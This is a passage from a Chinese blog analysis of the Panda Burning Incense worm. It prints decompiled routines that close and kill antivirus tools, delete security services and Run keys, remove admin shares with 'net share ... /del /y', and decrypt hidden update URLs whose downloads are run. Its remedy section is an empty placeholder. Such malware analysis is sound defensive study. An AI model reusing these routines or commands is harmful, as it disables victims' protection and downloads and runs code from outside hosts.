    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("网镖", v41) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("杀毒", v40) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("毒霸", v39) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("瑞星", v38) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("江民", v37) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("超级兔子", v36) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("优化大师", v35) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("木马清道夫", v34) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("木馬清道夫", v33) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("卡巴斯基反病毒", v32) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("Symantec AntiVirus", v31) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("Duba", v30) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("esteem procs", v29) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("绿鹰PC", v28) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("密码防盗", v27) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("噬菌体", v26) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("木马辅助查找器", v25) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("System Safety Monitor", v24) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("Wrapped gift Killer", v23) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("Winsock Expert", v22) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("游戏木马检测大师", v21) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("超级巡警", v20) )
      j_PostMessageA(v0, WM_QUIT, 0, 0);
  }
  while ( v0 );
  j_GetDesktopWindow();
  do
  {
    v3 = j_FindWindowExA(v2, v0, 0, 0);
    v0 = v3;
    v4 = j_FindWindowExA(v3, 0, "msctls_statusbar32", 0);
    v5 = j_FindWindowExA(v4, 0, 0, 0);
    j_GetWindowTextA(v5, &String, 101);
    unknown_libname_143(101, &String);
    if ( __linkproc__ LStrPos("pjf(ustc)", v19) )
    {
      j_PostMessageA(v0, WM_QUIT, 0, 0);
      v6 = j_MapVirtualKeyA('\x11', 0);
      j_keybd_event(0x11u, v6, 0, 0);
      v7 = j_MapVirtualKeyA('\x12', 0);
      j_keybd_event(0x12u, v7, 0, 0);
      v8 = j_MapVirtualKeyA('D', 0);
      j_keybd_event(0x44u, v8, 0, 0);
      v9 = j_MapVirtualKeyA('D', 0);
      j_keybd_event(0x44u, v9, 2u, 0);
      v10 = j_MapVirtualKeyA('\x11', 0);
      j_keybd_event(0x11u, v10, 2u, 0);
      v11 = j_MapVirtualKeyA('\x12', 0);
      j_keybd_event(0x12u, v11, 2u, 0);
      if ( j_FindWindowA(0, "IceSword") )
      {
        v12 = j_MapVirtualKeyA(0xDu, 0);
        j_keybd_event(0xDu, v12, 0, 0);
        v13 = j_MapVirtualKeyA(0xDu, 0);
        j_keybd_event(0xDu, v13, 2u, 0);
      }
    }
  }
  while ( v0 );
  sub_405FC4((int)"Mcshield.exe");
  sub_405FC4((int)"VsTskMgr.exe");
  sub_405FC4((int)"naPrdMgr.exe");
  sub_405FC4((int)"UpdaterUI.exe");
  sub_405FC4((int)"TBMon.exe");
  sub_405FC4((int)"scan32.exe");
  sub_405FC4((int)"Ravmond.exe");
  sub_405FC4((int)"CCenter.exe");
  sub_405FC4((int)"RavTask.exe");
  sub_405FC4((int)"Rav.exe");
  sub_405FC4((int)"Ravmon.exe");
  sub_405FC4((int)"RavmonD.exe");
  sub_405FC4((int)"RavStub.exe");
  sub_405FC4((int)"KVXP.kxp");
  sub_405FC4((int)"KvMonXP.kxp");
  sub_405FC4((int)"KVCenter.kxp");
  sub_405FC4((int)"KVSrvXP.exe");
  sub_405FC4((int)"KRegEx.exe");
  sub_405FC4((int)"UIHost.exe");
  sub_405FC4((int)"TrojDie.kxp");
  sub_405FC4((int)"FrogAgent.exe");
  sub_405FC4((int)"KVXP.kxp");
  sub_405FC4((int)"KvMonXP.kxp");
  sub_405FC4((int)"KVCenter.kxp");
  sub_405FC4((int)"KVSrvXP.exe");
  sub_405FC4((int)"KRegEx.exe");
  sub_405FC4((int)"UIHost.exe");
  sub_405FC4((int)"TrojDie.kxp");
  sub_405FC4((int)"FrogAgent.exe");
  sub_405FC4((int)"Logo1_.exe");
  sub_405FC4((int)"Logo_1.exe");
  sub_405FC4((int)"Rundl132.exe");
  sub_405FC4((int)"regedit.exe");
  sub_405FC4((int)"msconfig.exe");
  sub_405FC4((int)"taskmgr.exe");
  return;
}

(4.2) sub_40C9B0

key:xboy
encryptedCode:
`uup2..wv/ak97.ko.6>.tp&uyt
decryptedCode:
http://www.ac86.cn/66/up.txt
int __usercall sub_40C9B0@<eax>(void *this@<ecx>, int a2@<ebx>, int a3@<edi>, int a4@<esi>)
{
  decryptedFun_0(buff,encryptedCode, key);
  ConnecttoWeb(v4, (volatile signed __int32 *)&v52);
  LStrCmp((int)v52, (int)"QQ");
  if ( !v5 )
  {
    while ( v52 )
    {
      if ( (signed int)__linkproc__ LStrPos("\r\n", v52) <= 0 )
      {
        LStrLAsg(v6, v52);
        GetDir(&v44);
        sub_40C420(v42, (volatile signed __int32 *)&v43);
        LStrCat(v20, v43);
        j_URLDownloadToFileA(0, v19, v23, v24, v25);
        GetDir(&v41);
        j_WinExec(v29, v30);        
      }
      else{/*...*/}
    }
  }
  return System::__linkproc__ LStrArrayClr(v31);
}

(4.3) 创建了两线程 sub_40C9B0这个和4.2一样; sub_40CDEC是新的

关闭 本地文件共享

int __usercall sub_40CDEC@<eax>(int a1@<ebx>)
{
  v2 = GetpascalStrLenth(v15);/*获得Disk数量*/
  while ( v2 )
  {
    LStrCatN( 3, buff , "$ /del /y", diskName, "cmd.exe /c net share ");
    j_WinExec(buff, 0);
    --v2;
  } 
  j_WinExec("cmd.exe /c net share admin$ /del /y", 0);
  return;
}

(4.4) sub_406E44 关闭安全软件服务

int __stdcall sub_406E44()
{
  ExamineService((int)"Schedule");
  ExamineService((int)"sharedaccess");
  ExamineService((int)"RsCCenter");
  ExamineService((int)"RsRavMon");
  DeleteService("RsCCenter");
  DeleteService("RsRavMon");
  Certhelper::FindCertWithSerialNumber(v0, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\RavTask");
  ExamineService((int)"KVWSC");
  ExamineService((int)"KVSrvXP");
  DeleteService("KVWSC");
  DeleteService("KVSrvXP");
  Certhelper::FindCertWithSerialNumber(v1, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\KvMonXP");
  ExamineService((int)"kavsvc");
  ExamineService((int)&dword_407140);
  DeleteService((const CHAR *)&dword_407144);
  DeleteService("kavsvc");
  Certhelper::FindCertWithSerialNumber(v2, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\kav");
  Certhelper::FindCertWithSerialNumber(v3, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\KAVPersonal50");
  ExamineService((int)"McAfeeFramework");
  ExamineService((int)"McShield");
  ExamineService((int)"McTaskManager");
  DeleteService("McAfeeFramework");
  DeleteService("McShield");
  DeleteService("McTaskManager");
  Certhelper::FindCertWithSerialNumber(v4, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\McAfeeUpdaterUI");
  Certhelper::FindCertWithSerialNumber(
    v5,
    "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Network Associates Error Reporting Service");
  Certhelper::FindCertWithSerialNumber(v6, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ShStatEXE");
  DeleteService("navapsvc");
  DeleteService("wscsvc");
  DeleteService("KPfwSvc");
  DeleteService("SNDSrvc");
  DeleteService("ccProxy");
  DeleteService("ccEvtMgr");
  DeleteService("ccSetMgr");
  DeleteService("SPBBCSvc");
  DeleteService("Symantec Core LC");
  DeleteService("NPFMntor");
  DeleteService("MskService");
  DeleteService("FireSvc");
  Certhelper::FindCertWithSerialNumber(v7, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\YLive.exe");
  return Certhelper::FindCertWithSerialNumber(v8, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\yassistse");
}

(4.5) sub_40CC4C

用不同网址对qq进行攻击

`uup2..wv/tgl/cgl   `uup2..wv/1>2/cgl  `uup2..wv/sgit.knl
http://www.tom.com   http://www.163.com  http://www.sohu.com.

`uup2..wv/yiino&bnm  `uup2..wv/ggnflm/boe
http://www.yahoo.com  http://www.google.com

(4.6) sub_40C728 下载更新自身

`uup2..uxe`tm/vhjnx.fdu/nsm&uyt
http://update.whboy.net/worm.txt

3.解决方案

手工查杀步骤或是工具查杀步骤

标签: 安全 c++

本文转载自: https://blog.csdn.net/weixin_46566083/article/details/127036083
版权归原作者 在奋斗的大道上 所有, 如有侵权,请联系我们删除。

“熊猫烧香详解”的评论:

还没有评论